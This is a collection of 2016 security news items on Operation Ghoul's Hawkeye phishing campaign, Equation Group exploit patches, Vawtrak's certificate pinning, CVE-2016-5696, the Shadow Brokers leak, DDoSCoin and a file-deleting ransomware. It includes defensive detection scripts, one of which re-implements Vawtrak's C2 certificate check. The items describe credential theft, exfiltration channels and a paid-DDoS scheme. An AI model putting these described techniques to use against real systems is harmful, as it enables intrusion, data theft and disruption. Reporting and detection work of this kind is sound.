18.8.2016 Kaspersky Attack

Kaspersky Lab has observed new waves of attacks that started on the 8th and the 27th of June 2016. These have been highly active in the Middle East region and unveiled ongoing targeted attacks in multiple regions. The attackers try to lure targets through spear phishing emails that include compressed executables. The malware collects all data such as passwords, keystrokes and screenshots, then sends it to the attackers.

#OpGhoul targeting industrial, manufacturing and engineering organizations in 30+ countries
We found that the group behind this campaign targeted mainly industrial, engineering and manufacturing organizations in more than 30 countries. In total, over 130 organizations have been identified as victims of this campaign. Using the Kaspersky Security Network (KSN) and artifacts from malware files and attack sites, we were able to trace the attacks back to March 2015. Noteworthy is that since the beginning of their activities, the attackers' motivations have apparently been financial, whether through the victims' banking accounts or through selling their intellectual property to interested parties. Most infiltrated victim organizations are considered SMBs (Small to Medium size businesses, 30-300 employees), and the use of commercial off-the-shelf malware makes attribution of the attacks more difficult.

In total, over 130 organizations have been identified as victims of Operation Ghoul #OpGhoul
In ancient Folklore, the Ghoul is an evil spirit associated with consuming human flesh and hunting kids, originally a Mesopotamian demon. Today, the term is sometimes used to describe a greedy or materialistic individual.

Main infection vector: malicious emails

The following picture shows the e-mails used to deliver malware to the victims, disguised as a payment document. The e-mails sent by the attackers appear to come from a bank in the UAE, the Emirates NBD, and include a 7z file containing malware. In other cases, victims received phishing links. A quick analysis of the e-mail headers reveals that fake sources are being used to deliver the e-mails to victims.
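The header and attachment traits just described can be screened automatically at the mail gateway. The script below is an added example, not Kaspersky's code or anything from the report: it parses one message, compares the From domain with the envelope sender (Return-Path) and with the host named in the topmost Received hop, and lists archive attachments. The message it runs on is constructed, and every host, address and domain in it is a placeholder rather than an indicator from the campaign.

```python
"""Screen an inbound e-mail for a spoofed sender and an archive attachment.
Added example; the sample message is constructed and all hosts and addresses
in it are placeholders (.example / .invalid), not real indicators."""
import re
from email import message_from_string
from email.utils import parseaddr

ARCHIVE_EXTENSIONS = (".7z", ".zip", ".rar")

# Constructed sample message.  The base64 body is only the 7z magic bytes.
SAMPLE_EMAIL = """\
Return-Path: <bounce@bulkmailer.invalid>
Received: from mta.bulkmailer.invalid (mta.bulkmailer.invalid [192.0.2.10])
\tby mx.victim.example (Postfix) with ESMTP id 4ABC123
\tfor <ceo@victim.example>; Mon, 27 Jun 2016 09:12:44 +0400
From: "Emirates NBD" <advice@emiratesnbd.example>
To: ceo@victim.example
Subject: Payment Advice
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="XYZ"

--XYZ
Content-Type: text/plain

Please find attached the payment advice.
--XYZ
Content-Type: application/x-7z-compressed; name="EmiratesNBD_ADVICE.7z"
Content-Disposition: attachment; filename="EmiratesNBD_ADVICE.7z"
Content-Transfer-Encoding: base64

N3q8ryccAAQ=
--XYZ--
"""


def _domain(address_header):
    """Lower-cased domain part of an address header, or '' if absent."""
    _, addr = parseaddr(address_header or "")
    return addr.rpartition("@")[2].lower()


def _relay_host(received_header):
    """Host named in the 'from' clause of a Received: header, or ''."""
    m = re.match(r"\s*from\s+([^\s(]+)", received_header or "")
    return m.group(1).lower() if m else ""


def screen_email(raw_message):
    """Return header facts and a list of findings for one RFC 822 message."""
    msg = message_from_string(raw_message)
    from_domain = _domain(msg.get("From"))
    return_path_domain = _domain(msg.get("Return-Path"))
    # The topmost Received: line was written by our own MX, so it is the only
    # hop whose 'from' host we can trust; lower hops are attacker-controlled.
    received = msg.get_all("Received") or []
    relay = _relay_host(received[0] if received else "")
    attachments = [
        part.get_filename() for part in msg.walk()
        if part.get_content_disposition() == "attachment" and part.get_filename()
    ]

    findings = []
    if return_path_domain and return_path_domain != from_domain:
        findings.append("sender_domain_mismatch")   # envelope sender != From
    if relay and not relay.endswith(from_domain):
        findings.append("relay_host_mismatch")      # last hop is not the claimed sender's MTA
    if any(name.lower().endswith(ARCHIVE_EXTENSIONS) for name in attachments):
        findings.append("archive_attachment")       # payment advice rarely arrives as an archive

    return {
        "from_domain": from_domain,
        "return_path_domain": return_path_domain,
        "relay_host": relay,
        "attachments": attachments,
        "findings": findings,
        "suspicious": bool(findings),
    }


if __name__ == "__main__":
    print(screen_email(SAMPLE_EMAIL))
```

The three findings are deliberately independent: a legitimate bank mailing through a bulk-mail provider will trip the sender and relay checks but not the archive check, while a compromised legitimate mailbox will trip only the archive check, so each finding should carry its own weight in the gateway's scoring rather than being treated as a single verdict.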


Malicious attachments

In the case of spear phishing emails with an attachment, the 7z does not contain payment instructions but a malware executable (EmiratesNBD_ADVICE.exe). We have observed executables with the following MD5s:

Malware MD5 hashes


Email file MD5 hashes


The spear phishing emails are mostly sent to senior members and executives of targeted organizations, most likely because the attackers hope to get access to core intelligence, controlling accounts and other interesting information from people who have the following positions or similar:

Chief Executive Officer
Chief Operations Officer
General Manager
General Manager, Sales and Marketing
Deputy General Manager
Finance and Admin Manager
Business Development Manager
Export manager
Finance Manager
Purchase manager
Head of Logistics
Sales Executive
Technical details

Malware functionality

The malware is based on the Hawkeye commercial spyware, which provides a variety of tools for the attackers and also helps them avoid attribution. It starts by deploying itself and configuring persistence, using anti-debugging and timeout techniques, then begins collecting interesting data from the victim’s device, including:

Clipboard data
FileZilla ftp server credentials
Account data from local browsers
Account data from local messaging clients (Paltalk, Google talk, AIM…)
Account data from local email clients (Outlook, Windows Live mail…)
License information of some installed applications
Data exfiltration

Data is collected by the attackers using primarily:

HTTP GET requests
Sent to hxxp://
Email messages
mail.ozlercelikkapi[.]com, mail to info@ozlercelikkapi[.]com
mail.eminenture[.]com, mail to eminfo@eminenture[.]com
Both ozlercelikkapi[.]com and eminenture[.]com seem to belong to compromised organisations operating in manufacturing and technology services.

Malware command center

The malware connects to to deliver collected information from the victim’s PC. This information includes passwords, clipboard data, screenshots…



The IP address seems to belong to a compromised device running multiple malware campaigns.

Victim information

Victim organizations are distributed in different countries worldwide with attackers focused on certain countries more than others:


Number of Victim Organisations by Country

Countries marked as “others” have fewer than three victim organizations each; they are: Switzerland, Gibraltar, USA, Sweden, China, France, Azerbaijan, Iraq, Turkey, Romania, Iran, Iraq and Italy.

Victim industry information

Victim industry types were also indicators of targeted attacks, as the attackers were looking to infiltrate organizations that belong to the product life cycle of multiple goods, especially industrial equipment.


Number of Victim Organizations by Industry Type

Victim industry description

Industrial: Petrochemical, naval, military, aerospace, heavy machinery, solar energy, steel, pumps, plastics
Engineering: Construction, architecture, automation, chemical, transport, water
Shipping: International freight shipping
Pharmaceutical: Production/research of pharmaceutical and beauty products
Manufacturing: Furniture, decor, textiles
Trading: Industrial, electronics and food trading
Education: Training centers, universities, academic publishing
Tourism: Travel agencies
Technology/IT: Providers of IT technologies and consulting services
Unknown: Unidentified victims

The last attack waves

Kaspersky Lab user statistics indicate the new waves of attacks that started in June 2016 are focused on certain countries more than others.

Hundreds of detections have been reported by Kaspersky Lab users; 70% of the attacked users were found in the United Arab Emirates alone, the other 30% were distributed in Russia, Malaysia, India, Jordan, Lebanon, Turkey, Algeria, Germany, Iran, Egypt, Japan, Switzerland, Bahrain and Tunisia.


Other attack information

Phishing pages have also been spotted through, and although they are taken down quickly, more than 150 user accounts were identified as victims of the phishing links sent by the attackers. Victims were connecting from the following devices and inserting their credentials, a reminder that phishing attacks do work on all platforms:

Mac OS X
The malware files are detected using the following heuristic signatures:



Operation Ghoul is one of many attacks in the wild targeting industrial, manufacturing and engineering organizations; Kaspersky Lab recommends that users be extra cautious when checking and opening e-mails and attachments. In addition, privileged users need to be well trained and ready to deal with cyber threats; failure here is, in most cases, the cause of private or corporate data leakage, reputational damage and financial loss.

Indicators of Compromise

The following are common among the different malware infections; the presence of these is an indication of a possible infection.

Filenames and paths related to malware


List of malware related MD5 hashes


List of malware related domains


Observed phishing URLs


Other malware links

Malware links observed on dating back to March and April 2016:


Cisco, Fortinet issue fixes against Equation Group exploits

18.8.2016 Vulnerebility

Customers of Cisco and Fortinet security firms need to patch their products to fix the flaws exploited by the Equation Group exploits and hacking tools.
While security experts are analyzing the hacking tools leaked in the data dump by the Shadow Brokers, security firms are working to fix the vulnerabilities exploited by the Equation Group toolsets.

Both Fortinet and Cisco have issued patches to address the exploits that were leaked online; the list of affected products includes versions of Cisco’s PIX and ASA firewalls and versions of Fortinet FortiGate firewalls.


Cisco has confirmed that the two exploits EPICBANANA and EXTRABACON can be used to achieve remote code execution on Cisco firewalls.

Cisco confirmed that the code leaked by the “Shadow Brokers” includes exploits for the following flaws:

Cisco ASA SNMP Remote Code Execution Vulnerability
Cisco ASA CLI Remote Code Execution Vulnerability
The Cisco ASA SNMP Remote Code Execution vulnerability is newly found; both TALOS and Cisco IPS have produced signatures to detect it:

Snort Rule ID: 3:39885
Legacy Cisco IPS Signature ID: 7655-0
The Cisco ASA CLI Remote Code Execution Vulnerability was addressed in a defect fixed in 2011.

Fortinet also confirmed the bugs in its systems in a security advisory; the flaw is present in versions of the FortiGate firmware prior to 2012.

The company informed its customers of a cookie parser buffer overflow, confirming that versions 5.x are not affected.

“FortiGate firmware (FOS) released before Aug 2012 has a cookie parser buffer overflow vulnerability. This vulnerability, when exploited by a crafted HTTP request, can result in execution control being taken over.” states the advisory.
“Affected firmware versions are lower versions of 4.x firmware release.
FOS 5.x firmware is NOT affected.”

If a product can support 5.x firmware, that should be installed; if not, version 4.3.9 or above also fixes it.

Customers targeted by the exploits included in the leaked archive are invited to read the security advisories from the vendors and adopt the necessary countermeasures.

Note that although the vast majority of the files date back to 2013, in some cases the hacking tools could still be effective.

Vawtrak banking Trojan improved once again, now with SSL Pinning
17.8.2016 securityaffairs Virus

Security experts from Fidelis firm spotted a new version of the Vawtrak banking Trojan that includes significant improvements such as the SSL pinning.
Malware researchers from security firm Fidelis have spotted a new strain of the infamous Vawtrak banking Trojan that relies on a DGA mechanism to generate .ru domains with a pseudorandom number generator (PRNG) found in the loader.

Vawtrak, aka Neverquest, has been around for several years, it was used by criminal organizations to target online banking customers worldwide.


The new variant of the Vawtrak banking Trojan includes significant improvements such as the use of HTTPS to protect communication with the control infrastructure. The threat relies on certificate pinning, which is not common in malware.

SSL pinning provides an additional level of protection against man-in-the-middle attacks; in this specific case, the certificate pinning is implemented to evade security solutions that use their own certificates to inspect the traffic.

The new variant of the Vawtrak banking Trojan conducts checks based on the certificate's Common Name, so that the threat establishes connections only to legitimate C2 servers.

“This new Vawtrak DLL contains code for performing an HTTPS connection as well, but it also performs some checks on the certificate it receives from the C2 server. It adds up all the characters in the Common Name and then divides the byte by 0x1a and adds 0x61, which should match the first character (Figure 5). It also uses a public key from the aforementioned initial inject header to verify the signature hash that was passed in the SubjectKeyIdentifier field of the certificate.” states the blog post published by the Fidelis firm.
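The Common Name test quoted above is simple enough to re-implement, which makes it usable as a triage filter over certificate subjects from a TLS proxy or passive DNS log. The block below is an added example, not Fidelis' or the malware's code, and two readings of the description are assumptions: the character sum is kept in an 8-bit accumulator, and "divides the byte by 0x1a" means the remainder modulo 0x1a (so the result maps onto 'a'..'z'). The certificate's SubjectKeyIdentifier signature check is not reproduced, since the public key it needs is not on the page. The CN list at the bottom is constructed.

```python
"""Re-implementation, as an added example, of the Common Name test Fidelis
describes for Vawtrak's C2 certificate check, used as a hunting filter.
Assumptions: 8-bit accumulator for the sum; 'divide by 0x1a' = modulo 0x1a."""


def expected_first_char(common_name):
    """Character the malware expects at position 0 of the CN:
    (sum of all CN bytes, truncated to a byte) mod 0x1a, plus 0x61 ('a')."""
    total = sum(common_name.encode("utf-8")) & 0xFF   # 8-bit accumulator (assumption)
    return chr(total % 0x1A + 0x61)                   # modulo reading of 'divides' (assumption)


def passes_vawtrak_cn_check(common_name):
    """True if a certificate with this CN would satisfy the malware's test."""
    return bool(common_name) and common_name[0] == expected_first_char(common_name)


def flag_suspicious_cns(common_names, suffix=".ru"):
    """Filter observed certificate subjects to those that both pass the CN test
    and use the DGA's TLD.  Roughly 1 in 26 random names passes the test, so
    this is a triage filter to combine with other signals, not an indicator."""
    return [cn for cn in common_names
            if cn.lower().endswith(suffix) and passes_vawtrak_cn_check(cn)]


# Constructed sample of subject CNs seen on outbound TLS connections.
OBSERVED_CNS = ["test.ru", "all.ru", "mail.example.com", "bll.ru"]

if __name__ == "__main__":
    for cn in OBSERVED_CNS:
        print(f"{cn:20} expects '{expected_first_char(cn)}' -> {passes_vawtrak_cn_check(cn)}")
    print("candidates:", flag_suspicious_cns(OBSERVED_CNS))
```

Note what the CN test does and does not defend against from the malware's point of view: a TLS-inspecting proxy that re-signs the server certificate normally copies the subject, so the CN test alone would pass through inspection; it is the signature check on the SubjectKeyIdentifier, keyed to the operator's own public key, that actually defeats a proxy certificate. For defenders that means inspection appliances will see the implant connect and then abandon the session, which is itself a detectable pattern.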

The threat is delivered both via mass-spam campaigns and through exploit kits.

“Vawtrak has been a very successful banking trojan, delivered via both mass-spam campaigns as well as through exploit kits. Keeping this in consideration, it’s not surprising that new features and techniques are being introduced.” continues the blog post. “The use of DGAs and TLS is widespread across various crime families, but SSL pinning is still rare,”

Vawtrak is an effective banking Trojan thanks to continuous improvements; the recently introduced SSL pinning is a novelty in the banking malware landscape.

Someone is Spying on Researchers Behind VeraCrypt Security Audit
17.8.2016 thehackernews Krypto
After TrueCrypt mysteriously discontinued itself, VeraCrypt became the most popular open source disk encryption software used by activists, journalists, and privacy conscious people.
Due to the huge popularity of VeraCrypt, the OSTIF (Open Source Technology Improvement Fund) announced at the beginning of this month that it had arranged an independent security audit of VeraCrypt.
Using funds donated by DuckDuckGo and VikingVPN, the OSTIF hired vulnerability researchers from QuarksLab to lead the audit, which would look for zero-day vulnerabilities and other security holes in VeraCrypt's code.
Now, the most troubling part comes here:
The OSTIF announced Saturday that its confidential PGP-encrypted communications with QuarksLab about the security audit of VeraCrypt were mysteriously intercepted.
"We have now had a total of four email messages disappear without a trace, stemming from multiple independent senders." the OSTIF said. "Not only have the emails not arrived, but there is no trace of the emails in our "sent" folders. In the case of OSTIF, this is the Google Apps business version of Gmail where these sent emails have disappeared."
The information linked to the VeraCrypt security audit is so confidential that the OSTIF instructed the QuarksLab research team to give "any results of this audit directly to the lead developer of VeraCrypt using heavily encrypted communications."
This strict instruction was suggested at the beginning of this project to prevent the zero-day vulnerabilities from going into wrong hands or snoopers.
The team of researchers behind this security audit hopes to go public with their findings in mid-September, after reporting all the detected vulnerabilities, if any, in VeraCrypt to its original authors and getting them patched.
Until then, all the participants of the VeraCrypt Audit Project are required to maintain the utmost secrecy.
However, the sudden disappearance of four PGP-encrypted e-mail messages, each sent by independent parties involved in the project, has raised concerns about the leakage of confidential data, including weaknesses found in VeraCrypt.
The OSTIF suspects some outsiders are attempting to listen in on and/or interfere with the VeraCrypt security audit process.
"If nation-states are interested in what we are doing we must be doing something right," the OSTIF concludes.
Now, the OSTIF has switched to an alternative (undisclosed) encrypted communications process in order to move forward with the VeraCrypt audit project.
For more information Stay Tuned!

CVE-2016-5696 Linux flaw leaves 1.4 billion Android devices vulnerable to hack
17.8.2016 securityaffairs Vulnerebility

Experts from Lookout revealed that all Android versions running Linux kernel 3.6 up to the latest are affected by the CVE-2016-5696 Linux flaw.
Recently I wrote about a severe vulnerability (CVE-2016-5696) affecting the Linux version 3.6, deployed in 2012. The flaw was discovered by researchers from the University of California, Riverside, and the U.S. Army Research Laboratory that presented their findings at the USENIX Security 2016 conference.

The TCP/IP networking flaw allows attackers to spot communications between two entities and can be exploited to hijack the traffic and manipulate it if the exchange is not encrypted.

The attack is not considered a man-in-the-middle attack; the attackers just need to send spoofed packets to both sides of the connection, knowing only their IP addresses and destination ports.


According to the experts at Lookout security, the Linux vulnerability affects 80% of Android devices; it appears to have been introduced in Android version 4.4 (also called KitKat) and is still present in the current versions.

“Lookout recently discovered a serious exploit in TCP reported this week also impacts nearly 80% of Android, or around 1.4 billion devices, based on an install base reported by Statista. The vulnerability lets attackers obtain unencrypted traffic and degrade encrypted traffic to spy on victims.” reported Lookout security in a blog post.

The Linux vulnerability could be exploited by attackers to hijack traffic, inject malware into downloads and web pages, and run a wide range of attacks.

In a classic attack scenario, hackers inject malicious JavaScript into unencrypted network traffic to display a message that falsely claims the user has been logged out of his account and asks him to provide his login credentials.

A patch for the Linux kernel has been available since July 11, 2016, but the latest developer preview of Android Nougat is still affected by the flaw.

A Google spokesman confirmed that it is already working on the issue by “taking the appropriate actions.” The Google representative highlighted that the Android security team only rates the risk “moderate.”
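Until a patched kernel ships, the mitigation published alongside the CVE (not mentioned in the article above, but well established) is to raise net.ipv4.tcp_challenge_ack_limit from its default of 100 to a very large value, which removes the global challenge-ACK counter as a usable side channel. The checker below is an added example, not Lookout's or anyone else's tooling: it parses sysctl output or reads the live /proc value and reports whether the interim mitigation is in place. The sample output is constructed and the threshold it uses is an assumption.

```python
"""Check whether a Linux/Android host has the interim CVE-2016-5696 mitigation
(a raised net.ipv4.tcp_challenge_ack_limit).  Added example; the sample sysctl
output is constructed and RECOMMENDED_MINIMUM is an assumed threshold."""
import os

SYSCTL_KEY = "net.ipv4.tcp_challenge_ack_limit"
PROC_PATH = "/proc/sys/net/ipv4/tcp_challenge_ack_limit"
RECOMMENDED_MINIMUM = 999_999_999   # assumption: any 'very large' value serves the purpose

# Constructed sample of `sysctl -a` output from a host still at the default.
SAMPLE_SYSCTL_OUTPUT = """\
net.ipv4.tcp_challenge_ack_limit = 100
net.ipv4.tcp_syncookies = 1
net.ipv4.ip_forward = 0
"""


def parse_sysctl(text):
    """Parse 'key = value' lines as produced by `sysctl -a` into a dict."""
    settings = {}
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if sep:
            settings[key.strip()] = value.strip()
    return settings


def assess_challenge_ack_limit(settings, minimum=RECOMMENDED_MINIMUM):
    """Return (status, value) where status is 'mitigated', 'unmitigated' or 'unknown'."""
    raw = settings.get(SYSCTL_KEY)
    if raw is None:
        return "unknown", None          # key absent: pre-3.6 kernel or not Linux at all
    try:
        value = int(raw)
    except ValueError:
        return "unknown", raw
    return ("mitigated" if value >= minimum else "unmitigated"), value


def assess_local_host():
    """Read the live value from /proc on a Linux host; 'unknown' elsewhere."""
    if not os.path.exists(PROC_PATH):
        return "unknown", None
    with open(PROC_PATH) as fh:
        return assess_challenge_ack_limit({SYSCTL_KEY: fh.read().strip()})


if __name__ == "__main__":
    print("sample host:", assess_challenge_ack_limit(parse_sysctl(SAMPLE_SYSCTL_OUTPUT)))
    print("this host:  ", assess_local_host())
```

Two caveats when using this in an inventory: a kernel that already carries the upstream fix keeps the default value of 100, so the check reports "unmitigated" there and must be combined with a kernel-version or patch-level lookup; and on Android the sysctl can only be changed with root, so for unrooted devices the answer comes down to whether the vendor has shipped a patched kernel.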

NSA's Hacking Group Hacked! Bunch of Private Hacking Tools Leaked Online
15.8.2016 thehackernews Hacking
It seems like the NSA has been HACKED!
An unknown hacker or a group of hackers just claimed to have hacked into "Equation Group" -- a cyber-attack group allegedly associated with the United States intelligence organization NSA -- and dumped a bunch of its hacking tools (malware, private exploits, and hacking tools) online.
Not just this, the hackers, calling themselves "The Shadow Brokers," are also asking for 1 Million Bitcoins (around $568 Million) in an auction to release the 'best' cyber weapons and more files.
I know, it is really hard to believe, but some cybersecurity experts who have been examining the leak data, exploits and hacking tools, believe it to be legitimate.
Widely believed to be part of the NSA, Equation Group was described as "a threat actor that surpasses anything known in terms of complexity and sophistication of techniques, and that has been active for almost two decades," according to a report published by security firm Kaspersky in 2015.
Equation Group was also linked to previous infamous Regin and Stuxnet attacks, allegedly the United States sponsored hacks, though the link was never absolutely proven.
Two days back, The Shadow Brokers released some files, which it claimed came from the Equation Group, on Github (deleted) and Tumblr.
Exploits for American & Chinese Firewalls Leaked:
The files mostly contained installation scripts, configurations for command-and-control (C&C) servers, and exploits allegedly designed to target routers and firewalls from American manufacturers including Cisco, Juniper, and Fortinet.
According to the leaked files, Chinese company 'Topsec' was also an Equation Group target.
The leak mentioned names of some of the hacking tools that correlate with names used in the documents leaked by whistleblower Edward Snowden, like "BANANAGLEE" and "EPICBANANA."
"We follow Equation Group traffic," says the Shadow Broker. "We find Equation Group source range. We hack Equation Group. We find many many Equation Group cyber weapons. You see pictures. We give you some Equation Group files free, you see. This is good proof no? You enjoy!!! You break many things. You find many intrusions. You write many words. But not all, we are auction the best files."
It is not yet confirmed whether the leaked documents are legitimate, but some security experts agree that they likely are.
"I haven't tested the exploits, but they definitely look like legitimate exploits," Matt Suiche, founder of UAE-based cyber security firm Comae Technologies, told the Daily Dot.
Some are saying that the leak could be a very well-researched hoax, and that the Bitcoin auction could be nothing but a distraction in an attempt to gain media attention.
"If this is a hoax, the perpetrators put a huge amount of effort in," security researcher The Grugq told Motherboard. "The proof files look pretty legit, and they are exactly the sorts of exploits you would expect a group that targets communications infrastructure to deploy and use."
However, if NSA has successfully been hacked, the hack would be a highly critical cyber security incident.

DDoSCoin — New Crypto-Currency Pays Users for Participating in DDoS Attacks
14.8.2016 thehackernews Attack

It’s 2016, and now you can earn some dollars by contributing to a well-organized DDoS attack scheme.
Do you know while mining Bitcoins you are actually contributing a significant computational power to keep the Bitcoin network running?
In Bitcoin, the miners actually build and maintain a massive public ledger containing a record of every Bitcoin transaction in history.
When one user tries to send Bitcoins to another user, the miners validate the transfer by checking the ledger to make sure the sender is not transferring money he/she does not have, adding the transaction to the ledger and then finally sealing it behind layers and layers of computational work to protect that ledger from getting compromised or hacked.
So for this, miners are rewarded with Bitcoins.
So, basically, you are contributing the massive amount of computing power that keeps the Bitcoin transactions running and makes you earn some cryptocurrency in return as an incentive.
However, Bitcoin has long been criticized for not utilizing that huge amount of computational power into something useful as well.
To utilize all those CPU cycles, a few years back researchers came forward with another cryptocurrency, called "PrimeCoin."
In PrimeCoin, the miners’ computational power is not only used to keep transactions running but also to find long chains of prime numbers, which play a great role in encryption and cryptography.
But, this time, a pair of curious researchers recently proposed the weirdest concept:
A malicious digital currency that can be mined only if the miners participate in Distributed Denial of Service (DDoS) attacks against preselected target websites, making them temporarily unavailable by flooding them with millions of simultaneous requests.
Proof-of-DDoS: Participate in DDoS Attack and Earn Reward
DDoSCoin, developed by Eric Wustrow and Benjamin VanderSloot from the University of Colorado Boulder and the University of Michigan, is a theoretical cryptocurrency that rewards a miner for opening a large number of TLS connections to target web servers.
The malicious proof-of-work (which the duo called "Proof-of-DDoS") model used by DDoSCoin miners functions only with websites that support TLS 1.2, and since over half of the top million websites support TLS 1.2 version of the protocol, it will be easy for miners to earn the reward.
"In modern versions of TLS, the server signs a client-provided parameter during the handshake, along with server-provided values used in the key exchange of the connection," the researchers wrote in the paper DDoSCoin: Cryptocurrency with a Malicious Proof-of-Work [PDF], allowing the client to prove that it has participated in the DDoS attack against the target server.
In this way, the new system will reward users who prove they have participated in a DDoS attack.
Miners with DDoSCoin blocks could then trade their cryptocurrencies for other, including Bitcoin and Ethereum, the researchers suggested.
The researchers presented their paper at the USENIX Security 2016 conference, noting that Bitcoin's computationally intensive proof-of-work "does not contribute to any useful problems besides securing the currency from attack."

If you want to set up a target for DDoS, you can use the PAY_TO_DDOS transaction that includes two arguments:
Domain of the victim website.
The number of TLS connections that need to be established.
These transactions are recorded as DDoSCoin blocks inside a database (or blockchain). Now, miners only need to select one of the blocks, launch attacks, and thus receive DDoSCoin as a reward for fulfilling the transaction.
What If Everybody wants to DDoS Everybody?
Now, the question here is: how will this cryptocurrency decide which target should get DDoSed first?
According to the researchers, multiple miners must participate and decide together which domain is to be attacked.
Future Schemas and DDoS Frameworks
Till now, we have seen multiple hire-for-DDoS services in the underground market, where anyone willing to take down a targeted website can just pay hackers and get their job done.
Currently, this paper is only a theoretical concept, and the DDoSCoin cryptocurrency does not exist.
However, I can predict that soon we will see similar business models from blackhat hackers, where, to earn money, people would themselves join botnet networks to contribute their bandwidth for DDoS attacks.

Hitler ransomware just deletes files instead encrypt them
14.8.2016 securityaffairs Virus

Security experts detected and analyzed a new threat, the Hitler ransomware, that doesn’t encrypt files but simply deletes them. Ransomware is one of the most dreaded threats for Internet users and a profitable business for crooks. In the last months, we have seen a number of malware belonging to this category, one of the most recent is a Hitler-themed ransomware that doesn’t encrypt files, but simply deletes them.


In reality, the threat appears to be a work in progress project developed by coders without specific skills.

The Windows ransomware displays a lock screen featuring Hitler, together with a message that warns users that files have been encrypted.

The ransomware requests a payment of only 25 euros, in the form of a Vodafone cash card, which is unusual for this kind of crime.

The lock screen features a misspelling “Ransonware.”

The website Bleeping Computer published a detailed analysis of the Hitler ransomware that was first spotted by the malware analyst Jakub Kroustek from AVG.

“This ransomware appears to be a test variant based on the comments in the embedded batch file and because it does not encrypt any files at all. Instead this malware will remove the extension for all of the files under various directories, display a lock screen, and then show a one hour countdown as shown in the lock screen below.” reads the post published by Bleeping Computer “After that hour it will crash the victim’s computer, and on reboot, delete all of the files under the %UserProfile% of the victim. I hope this is not the actual code that this ransomware developer plans on using if it goes live.”
Jakub Kroustek (@JakubKroustek) tweeted on 7 Aug 2016 at 21:09:
“*sigh* #Hitler #Ransomware. #GrammarNazi. https://www.virustotal.com/en/file/06c8e0f6fa2616f4fa92c610a1faea23887ac31db8fa78cede49b6b8c80ec22f/analysis/1470566199 …”
The experts found the string “Das ist ein Test” (“This is a test”) in an embedded batch file, which suggests the developer is German-based.
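The behaviour Bleeping Computer describes, renaming every file under a set of directories so that its extension disappears, is noisy on the file system and easy to alert on from endpoint or file-audit telemetry. The detector below is an added example, not part of the analysis quoted above: it takes a list of file-system events, keeps only renames that drop a file's extension while leaving its directory and stem intact, and raises an alert when such renames cluster within a short window. The events it runs on are constructed, and the window and threshold are assumed tuning values.

```python
"""Detect bursts of extension-stripping renames (the behaviour described for
the test variant above).  Added example; SAMPLE_EVENTS is constructed and the
window/threshold defaults are assumed tuning values."""
import ntpath
from datetime import datetime, timedelta

# Constructed file-system events: (ISO timestamp, operation, old path, new path).
SAMPLE_EVENTS = [
    ("2016-08-07T21:05:00", "rename", r"C:\Users\bob\Documents\report.docx", r"C:\Users\bob\Documents\report"),
    ("2016-08-07T21:05:01", "rename", r"C:\Users\bob\Documents\budget.xlsx", r"C:\Users\bob\Documents\budget"),
    ("2016-08-07T21:05:01", "rename", r"C:\Users\bob\Pictures\holiday.jpg", r"C:\Users\bob\Pictures\holiday"),
    ("2016-08-07T21:05:02", "rename", r"C:\Users\bob\Desktop\notes.txt", r"C:\Users\bob\Desktop\notes"),
    ("2016-08-07T21:05:02", "rename", r"C:\Users\bob\Music\song.mp3", r"C:\Users\bob\Music\song"),
    ("2016-08-07T21:05:03", "rename", r"C:\Users\bob\Videos\clip.mp4", r"C:\Users\bob\Videos\clip"),
    # Benign activity that must not match: a versioned rename and a new file.
    ("2016-08-07T21:30:00", "rename", r"C:\Users\bob\Documents\draft.docx", r"C:\Users\bob\Documents\draft_v2.docx"),
    ("2016-08-07T21:31:00", "create", "", r"C:\Users\bob\Documents\new.docx"),
]


def strips_extension(old_path, new_path):
    """True when a rename keeps the directory and stem but drops the extension."""
    stem, ext = ntpath.splitext(ntpath.basename(old_path))   # ntpath: Windows paths on any host
    same_dir = ntpath.dirname(old_path).lower() == ntpath.dirname(new_path).lower()
    return bool(ext) and same_dir and ntpath.basename(new_path) == stem


def _alert(burst):
    """Summarise one burst of hits as an alert record."""
    return {
        "start": burst[0][0].isoformat(),
        "end": burst[-1][0].isoformat(),
        "count": len(burst),
        "sample_paths": [old for _, old, _ in burst[:3]],
    }


def detect_extension_stripping_bursts(events, window_seconds=60, threshold=5):
    """Return one alert per burst of at least `threshold` extension-stripping
    renames whose first and last event lie within `window_seconds`."""
    hits = sorted(
        (datetime.fromisoformat(ts), old, new)
        for ts, op, old, new in events
        if op == "rename" and strips_extension(old, new)
    )
    window = timedelta(seconds=window_seconds)
    bursts, current = [], []
    for hit in hits:
        if current and hit[0] - current[0][0] > window:
            bursts.append(current)       # gap too large: close the current burst
            current = []
        current.append(hit)
    if current:
        bursts.append(current)
    return [_alert(b) for b in bursts if len(b) >= threshold]


if __name__ == "__main__":
    for alert in detect_extension_stripping_bursts(SAMPLE_EVENTS):
        print(alert)
```

The same shape of rule (many renames of distinct files by one process in a short window) is what catches encrypting ransomware as well, which typically appends an extension instead of removing it; in production the rule should key on the process and user that performed the renames, which the constructed events here omit for brevity.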